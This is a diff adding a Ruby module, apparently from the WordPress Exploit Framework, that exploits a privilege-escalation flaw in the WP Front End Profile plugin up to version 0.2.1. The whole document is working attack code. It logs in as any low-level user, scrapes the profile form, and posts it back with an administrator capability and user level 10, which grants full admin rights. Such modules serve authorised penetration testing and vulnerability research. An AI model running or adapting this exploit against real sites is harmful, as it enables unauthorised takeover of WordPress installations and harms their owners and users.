|
| 1 | +class Wpxf::Auxiliary::WpFrontEndProfilePrivilegeEscalation < Wpxf::Module |
| 2 | + include Wpxf |
| 3 | + |
| 4 | + def initialize |
| 5 | + super |
| 6 | + |
| 7 | + update_info( |
| 8 | + name: 'WP Front End Profile <= 0.2.1 Privilege Escalation', |
| 9 | + desc: 'The WP Front End Profile plugin, in versions <= 0.2.1, allows authenticated '\ |
| 10 | + 'users of any user level to escalate their user role to an administrator.', |
| 11 | + author: [ |
| 12 | + 'Rob Carr <rob[at]rastating.com>' # WPXF module |
| 13 | + ], |
| 14 | + references: [ |
| 15 | + ['WPVDB', '8620'] |
| 16 | + ], |
| 17 | + date: 'Sep 15 2016' |
| 18 | + ) |
| 19 | + |
| 20 | + register_options([ |
| 21 | + StringOption.new( |
| 22 | + name: 'username', |
| 23 | + desc: 'The WordPress username to authenticate with', |
| 24 | + required: true |
| 25 | + ), |
| 26 | + StringOption.new( |
| 27 | + name: 'password', |
| 28 | + desc: 'The WordPress password to authenticate with', |
| 29 | + required: true |
| 30 | + ), |
| 31 | + StringOption.new( |
| 32 | + name: 'profile_form_path', |
| 33 | + desc: 'The path to the page containing the profile editor form', |
| 34 | + required: true |
| 35 | + ) |
| 36 | + ]) |
| 37 | + end |
| 38 | + |
| 39 | + def check |
| 40 | + check_plugin_version_from_readme('wp-front-end', '0.2.2') |
| 41 | + end |
| 42 | + |
| 43 | + def username |
| 44 | + datastore['username'] |
| 45 | + end |
| 46 | + |
| 47 | + def password |
| 48 | + datastore['password'] |
| 49 | + end |
| 50 | + |
| 51 | + def profile_form_url |
| 52 | + normalize_uri(full_uri, datastore['profile_form_path']) |
| 53 | + end |
| 54 | + |
| 55 | + def form_fields_with_default_values(cookie) |
| 56 | + res = execute_get_request(url: profile_form_url, cookie: cookie) |
| 57 | + return nil unless res && res.code == 200 |
| 58 | + |
| 59 | + fields = {} |
| 60 | + res.body.scan(/<input.+?name="(.+?)".+?value="(.*?)".*?>/i) do |match| |
| 61 | + if match[0].start_with?('wpfep_nonce_name', '_wp_http_referer', 'profile[') |
| 62 | + emit_info "Found field #{match[0]}", true |
| 63 | + fields[match[0]] = match[1] |
| 64 | + end |
| 65 | + end |
| 66 | + |
| 67 | + fields |
| 68 | + end |
| 69 | + |
| 70 | + def run |
| 71 | + return false unless super |
| 72 | + |
| 73 | + cookie = authenticate_with_wordpress(username, password) |
| 74 | + return false unless cookie |
| 75 | + |
| 76 | + emit_info 'Requesting profile editor form...' |
| 77 | + form_fields = form_fields_with_default_values(cookie) |
| 78 | + |
| 79 | + if form_fields.nil? |
| 80 | + emit_error 'Failed to retrieve the profile form' |
| 81 | + return false |
| 82 | + end |
| 83 | + |
| 84 | + form_fields['profile[wp_user_level]'] = 10 |
| 85 | + form_fields['profile[wp_capabilities][administrator]'] = 1 |
| 86 | + form_fields['profile[wpfep_save]'] = 'Update Profile' |
| 87 | + |
| 88 | + emit_info 'Elevating privileges...' |
| 89 | + execute_post_request(url: profile_form_url, cookie: cookie, body: form_fields) |
| 90 | + end |
| 91 | +end |